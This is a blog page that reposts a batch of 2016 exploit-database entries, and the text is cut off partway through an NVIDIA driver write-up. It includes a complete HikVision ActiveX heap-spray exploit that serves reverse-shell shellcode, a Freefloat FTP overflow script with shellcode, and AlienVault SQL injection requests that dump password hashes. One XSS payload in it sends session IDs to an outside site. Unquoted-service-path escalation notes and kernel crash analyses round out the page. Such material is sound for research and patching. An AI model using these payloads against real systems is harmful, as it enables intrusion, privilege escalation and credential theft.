#########################################################################
# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
# Date: 19/10/2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
# version : 10.0.2 (Latest)
# Tested on: Windows 7
##########################################################################
IObit Advanced SystemCare installs a service with an unquoted service path
To properly exploit this vulnerability, the local attacker must insert
an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AdvancedSystemCareService10
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService10
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : Advanced SystemCare Service 10
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
################################################
######### Ashiyane Digital Security Team ############
########## exploit by: Amir.ght #####################
################################################
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863112321
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
# visit eastfw.com eastexploits.com for more info
import sys
import re
import os
import socket
import random
import string
from struct import pack
sys.path.append("./core")
from Sploit import Sploit
sys.path.append("./shellcodes")
from Shellcodes import OSShellcodes
INFO={}
INFO['NAME']="efa_HikVision_Security_Systems_activex"
INFO['DESCRIPTION']="HikVision Security Systems activex Remote Overflow"
INFO['VENDOR']="http://www.hikvision.com/us/Tools_84.html"
INFO["CVE Name"]="0-day"
INFO["NOTES"]="""
Exploit-db.com information:
# Exploit Title: HikVision Security Systems ActiveX exploit designed for EAST framework
# Google Dork: none
# Date: 19 October 2016
# Exploit Author: EAST framework development team. Yuriy Gurkin
# Vendor Homepage: http://www.hikvision.com/us
# Software Link: http://www.hikvision.com/us/Tools_84.html client software
# Version: v2.5.0.5
# Tested on: Windows XP, 7
# CVE : 0day
General information:
Loaded File: C:\temp\WEBCAM~1\HIKVIS~1\NETVID~1.OCX
Name: NETVIDEOACTIVEX23Lib
Lib GUID: {99F388E9-F788-41D5-A103-8F4961539F88}
Version: 1.0
Lib Classes: 1
Class NetVideoActiveX23
GUID: {CAFCF48D-8E34-4490-8154-026191D73924}
Number of Interfaces: 1
Default Interface: _DNetVideoActiveX23
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
"""
INFO['CHANGELOG']="13 Jan, 2016. Written by Gleg team."
INFO['PATH'] = "Exploits/"
PROPERTY = {}
PROPERTY['DESCRIPTION'] = "ActiveX 0-day"
PROPERTY['MODULE_TYPE'] = "Scada"
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["CONNECTBACK_PORT"] = "8089"
class exploit(Sploit):
def __init__(self,
port=8089,
logger=None):
Sploit.__init__(self,logger=logger)
self.port = port
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
return
def create_shellcode(self):
self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())
if self.args['listener']:
shellcode_type = 'reverse'
port = int(self.args['listener']['PORT'])
else:
port = 9999
shellcode_type = 'command'
self.CONNECTBACK_PORT = port
os_system = os_target = 'WINDOWS'
os_arch = '32bit'
s = OSShellcodes(os_target,
os_arch,
self.CONNECTBACK_IP,
self.CONNECTBACK_PORT)
s.TIMESTAMP = 'codesys'
shellcode = s.create_shellcode(
shellcode_type,
encode=0,
debug=1
)
return shellcode
def make_data(self, shellcode):
filedata="""
<html>
<object classid='clsid:CAFCF48D-8E34-4490-8154-026191D73924' id='target' ></object>
<script type='text/javascript' language="javascript">
ar=new Array();
function spray(buffer) {
var hope = unescape('%u9090%u9090');
var unbuffer = unescape(buffer);
var v = 20 + unbuffer.length;
while(hope.length<v)
hope += hope;
var fk = hope.substring(0, v);
var bk = hope.substring(0, hope.length- v );
delete v;
delete hope;
while(bk.length+v<0x40000) {
bk=bk+bk+fk;
}
for(i=0;i<3500;i++) {
ar[i] = bk + unbuffer;
}
}
spray(<SHELLCODE>);
buffer = "";
for (i = 0; i < 555; i++) buffer += unescape('%u9090%u9090');
target.GetServerIP (buffer);
</script>
</html>
"""
if len(shellcode)%2:
shellcode="\x90"+shellcode
shell="unescape(\""
i = 0
while i < len(shellcode):
shell += "%u"+"%02X%02X" %(ord(shellcode[i+1]),ord(shellcode[i]))
i += 2
shell += "\")"
filedata = filedata.replace("<SHELLCODE>", shell)
return filedata
def run(self):
self.args()
self.log("Generating shellcode")
shellcode = self.create_shellcode()
if not shellcode:
self.log("Something goes wrong")
return 0
self.log("Generate Evil HTML")
html = self.make_data(shellcode)
self.log("Done")
self.log("Starting web server")
ip_server = "0.0.0.0"
crlf = "\r\n"
response = "HTTP/1.1 200 OK" + crlf
response += "Content-Type: text/html" + crlf
response += "Connection: close" + crlf
response += "Server: Apache" + crlf
response += "Content-Length: " + str(len(html))
response += crlf + crlf + html + crlf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = (ip_server, 8089)
s.bind(server)
s.listen(1)
while True:
try:
connection, client_address = s.accept()
data = connection.recv(2048)
self.log("Got request, sending payload")
connection.send(response)
self.log("exploit send")
connection.close()
except:
print("EXCEPT")
self.log('All done')
self.finish(True)
return 1
if __name__ == '__main__':
"""
By now we only have the tool
mode for exploit..
Later we would have
standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1",80)
e.run()
# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 8.0.1.1399
# Tested on: Windows 7 Professional
The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 8.0.1.1399, but other versions may be affected
as well.
---------------------------------------------------------------------------
C:\>sc qc LMS
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LMS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) Management and Security Application Local Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Lenovo RapidBoot HDD Accelerator - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.00.0802
# Tested on: Windows 7 Professional
The Lenovo RapidBoot HDD Accelerator service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.00.0802, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc FastbootService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FastbootService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FastbootService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Lenovo Slim USB Keyboard - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.09
# Tested on: Windows 7 Professional
The Lenovo Slim USB Keyboard service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.09, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc Sks8821
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Sks8821
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Skdaemon Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Vembu StoreGrid - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 4.0
# Tested on: Windows Server 2012
StoreGrid is a re-brandable backup solution, which can install 2 services with unquoted service paths.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 4.0, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RemoteBackup
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\bin\StoreGrid.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc RemoteBackup_webServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup_webServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\apache\Apache.exe -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup_WebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
# Exploit Title: Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 15.1.0.0096
# Tested on: Windows 7 Professional
The Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 15.1.0.0096, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc AMPPALR3
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AMPPALR3
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intelr Centrinor Wireless Bluetoothr + High Speed Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=880
The \\.\UVMLiteController device is created by the nvlddmkm.sys driver, and can be opened by any user. The driver handles various control codes for this device, but there is no validation for the input/output buffer and their sizes.
In addition to potential overreads on the input, the driver writes output directly to Irp->UserBuffer, which is the output pointer passed to DeviceIoControl() by the user. The IO control codes handled specify METHOD_BUFFERED, but the kernel does no validation that the output pointer is accessible by the user process if the user passes an output buffer size of 0.
This means that a user mode program can cause a write of (at least) the 32-bit values 0 or 31, or the 8-bit value 0 to any address given to the driver.
A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414141414141+0x30.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip
<!--
Source: http://blog.skylined.nl/20161101001.html
Synopsis
A specially crafted webpage can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<!doctype html>
<script>
oTextArea = document.createElement('textarea');
oTextArea.dataSrc = 1;
oTextArea.id = 1;
oTextArea.innerHTML = 1;
oTextArea.onvolumechange = 1;
oTextArea.style.setProperty('list-style', "url()");
</script>
<!--
Analysis
The CAttrArray object initially allocates a CImplAry buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.
Exploit
If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
Timeline
- April 2014: This vulnerability was found through fuzzing.
- July 2014: This vulnerability was submitted to ZDI.
- July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.
- October 2014: Microsoft release MS14-056, which addresses this issue.
- November 2016: Details of this issue are released.
-->
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of
/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
sending a serialized array with a SQL query in the type field, it's
possible to execute an arbitrary SQL query. The result is not
displayed on the screen, but it can be exploited as a blind SQLi or
have the output directed to a file and then retrieved via another
request. Authentication is required.
POC
===
This request will dump user password hashes to a file:
/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
The file containing the output can then be retrieved with the following request:
/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
It's also possible to read the contents of any file readable by the
mysql user by using mysql's load_file function. For example, changing
the request to something like select load_file('/etc/passwd') .
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the
login process. It's possible to inject a script into that header that
then gets executed when mousing over the User-Agent field in Settings
-> Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)
<script>$('#ops_table
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2
Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files
due to the unsafe use of the unserialize() function. The affected
files include flow_chart.php, gauge.php, honeypot.php,
image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
taxonomy.php, tickets.php, and url.php.
An authenticated attacker could send a serialized PHP object to one of
the vulnerable pages and potentially gain code execution via magic
methods in included classes.
POC
====
This benign POC injects the IDS_Report class from PHPIDS into the
refresh parameter of image.php. The __toString method of IDS_Report is
then executed and the output is displayed in the value of the content
field in the response:
/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
==========
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
import socket
import sys
import os
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
# Date: 2016.11.02
# Exploit Author: Greg Priest
# Version: FreefloatFTPserver1.0
# Tested on: Windows7 x64 HUN/ENG Professional
'''
ip = raw_input("Target ip: ")
port = 21
overflow = 'A' * 247
eip = '\xF4\xAF\xEA\x75' + '\x90' * 10
#shellcode calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + eip + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print '''
Successfull Exploitation!
'''
message = 'dir ' + remotecode
s.send(message)
s.recv(1024)
s.close
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=942
The DxgkDdiEscape handler for escape 0x100009a lacks proper bounds checks:
case 0x100009A:
...
size_0 = escape_data->size_1;
...
size_1 = 2 - (escape_data->unknown < 18);
...
size_2 = escape_data->size_2;
...
total_size = size_0 * size_1 * size_2;
...
if (total_size > 0x10)
do_debug_thingo();
if (total_size) {
DWORD* ptr = alloced_buf + 24;
DWORD* user_buf = escape_data->data;
...
while (total_size) {
*(ptr - 1) = *(user_buf - 1);
*ptr = *user_buf;
...
user_buf += 4;
ptr += 39;
--total_size;
}
There is a check that total_size > 0x10, which calls some kind of a
debug/logging function (do_debug_thingo in my pseudocode), but it does not
actually stop processing of the escape. This leads to buffer overflow on the
allocated pool buffer later on.
Note that there is also a potential integer overflow in the calculation of
|total_size|. Since the individual sizes (size_0, size_1, size_2) appear to be
stored in a struct and eventually passed off to another function, there may be
more problems later on too.
Crashing context with PoC (Win10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
...
rax=00000000caa6ed30 rbx=0000000000000000 rcx=ffffc001cd337044
rdx=00000000000f41bd rsi=0000000000000000 rdi=0000000000000000
rip=fffff80102461188 rsp=ffffd000243bbed0 rbp=ffffd000243bbfd0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
nvlddmkm!nvDumpConfig+0x12a2b0:
fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd337040=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40665.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=940
The DxgkDdiEscape handler for 0x70001b2 doesn't do proper bounds checks for its
variable size input.
void sub_8C4304(...) {
...
// escape_->size is controlled by the user.
if ( escape_->size < size )
size = escape_->size;
memcpy(escape_->data, v31, 28i64 * size);
...
}
Note that this appears to be a common pattern. Normally, before
escape handlers are executed, |PrivateDriverDataSize| (from DXGKARG_ESCAPE)
is checked to be equal to some value against a hardcoded table. However, some escapes
allow a more relaxed check that |PrivateDriverDataSize| >= minimum. This means that
the handler themselves must implement an ad hoc bounds check, which either seems to be
missing or implemented incorrectly (relying on a user specified value) in many cases.
bug 936 is a similar issue and there are likely more. I've noticed (but not confirmed)
a few more OOB reads that I haven't reported that follow this same pattern.
Crashing context with PoC (Win 10 x64 with 372.54):
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
...
rax=ffffd000239d51dc rbx=0000000000000000 rcx=fffffffffffffff4
rdx=fffff000e9e6c754 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80166d6aca0 rsp=ffffd000239d3df8 rbp=ffffd000239d3f00
r8=0000000000000924 r9=000000000000003b r10=000000000000e9ef
r11=ffffd000239d48ac r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe cy
nvlddmkm+0x5daca0:
fffff801`66d6aca0 f30f7f40f0 movdqu xmmword ptr [rax-10h],xmm0 ds:ffffd000`239d51cc=????????????????????????????????
Resetting default scope
To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40664.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=937
The DxgkDdiEscape handler for 0x5000027 accepts a user provided pointer,
but does no checks on it before using it.
...
DWORD* user_ptr = escape_5000027_data->user_ptr;
v32 = user_ptr[2];
v33 = user_ptr + 3;
if ( v32 != -1 )
v33 = (_DWORD *)v32;
sub_91C24(miniport_context_, *user_ptr, user_ptr[1], v33, (__int64)&escape_data_);
...
The PoC I’ve provided causes a read on said pointer, but based on inspecting where this pointer
is passed it seems like there is at least 1 code path that can result in a write (I haven't
confirmed this though).
(On Win 10 x64 with 372.54)
FAULTING_IP:
nvlddmkm!nvDumpConfig+1338c7
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8]
CONTEXT: ffffd00023649970 -- (.cxr 0xffffd00023649970)
rax=4141414141414141 rbx=ffffd0002364a870 rcx=0000000005000017
rdx=ffffd0002364a498 rsi=0000000000000000 rdi=ffffd0002364a498
rip=fffff8018a26a79f rsp=ffffd0002364a390 rbp=ffffd0002364a4a9
r8=ffffd0002364a870 r9=ffffe8023c537220 r10=0000000000000000
r11=ffffd0002364a370 r12=ffffe8023c537220 r13=fffff80189fa9370
r14=ffffe000d6f2a000 r15=ffffe8023c537220
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
nvlddmkm!nvDumpConfig+0x1338c7:
fffff801`8a26a79f 8b4808 mov ecx,dword ptr [rax+8] ds:002b:41414141`41414149=????????
Resetting default scope
To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40663.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=936
The DxgkDdiEscape handler for 0x7000170 lacks proper bounds checks for the variable size
input escape data, and relies on a user provided size as the upper bound for writing output.
Crashing context with PoC (Win 10 x64 with 372.54):
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
...
rax=fffff801f417e600 rbx=0000000000000000 rcx=0000000000000002
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801f4152b75 rsp=ffffd000287b4468 rbp=ffffd000287b53e8
r8=fffff801f4169e24 r9=ffffd000287b5620 r10=ffffd000287b5620
r11=0000000000000450 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz ac pe nc
dxgkrnl!_report_gsfailure+0x5:
fffff801`f4152b75 cd29 int 29h
Resetting default scope
EXCEPTION_RECORD: ffffd000287b4228 -- (.exr 0xffffd000287b4228)
ExceptionAddress: fffff801f4152b75 (dxgkrnl!_report_gsfailure+0x0000000000000005)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=927
The DxgkDdiEscape handler for escape code 0x100010b looks like:
char escape_100010b(NvMiniportDeviceContext *miniport_context, HANDLE handle, unsigned int idx)
{
PVOID *Object;
if ( !handle )
do_debug_thingo();
Object = (PVOID *)&miniport_context->UNKNOWN[8 * idx + 22696];
if ( !ObReferenceObjectByHandle(handle_, SYNCHRONIZE, )ExEventObjectType, UserMode, Object, 0i64) )
{
result = 0;
if ( *Object )
result = UserMode;
}
return result;
}
It essentially takes in a user mode event handle from userspace, and calls
ObReferenceObjectByHandle on it, writing the object pointer to |Object|. Note
that the kernel implementation of ObReferenceObjectByHandle always begins with
writing NULL to this pointer regardless of whether or not the handle is valid.
|Object| is calculated using a user provided index that is not bounds checked,
leading to OOB write of either NULL or the KEVENT pointer:
Object = (PVOID *)&miniport_context_->UNKNOWN[8 * idx + 22696];
The attached PoC causes the following crashing context on Win x64 372.54:
PAGE_FAULT_IN_NONPAGED_AREA (50)
...
rax=ffffe0025ea28f50 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000100000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801d8f3daf5 rsp=ffffd000203deda0 rbp=0000000000000001
r8=ffffe000506d4b50 r9=ffffe000524fb201 r10=0000000000000000
r11=ffffd000203df370 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
nt!ObReferenceObjectByHandleWithTag+0x45:
fffff801`d8f3daf5 488908 mov qword ptr [rax],rcx ds:ffffe002`5ea28f50=????????????????
To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40661.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=918
The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
In this particular routine,
if ( cur->image_names_count > 0 ) {
// info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
image_filename = info_->ImageFileName;
buf = image_filename->Buffer;
if ( buf )
{
if ( !v5 )
{
i = 0i64;
num_chars = image_filename->Length / 2;
// Look for the filename by scanning for backslash.
if ( num_chars )
{
while ( buf[num_chars - (unsigned int)i - 1] != '\\' )
{
i = (unsigned int)(i + 1);
if ( (unsigned int)i >= num_chars )
goto LABEL_39;
}
buf += num_chars - (unsigned __int64)(unsigned int)i;
}
LABEL_39:
v26 = (unsigned int)i;
wcscpy_s((wchar_t *)Dst, i, buf);
Dst[v26] = 0;
wcslwr((wchar_t *)Dst);
v5 = 1;
wcscpy_s is used incorrectly here, as the second argument is not the size of
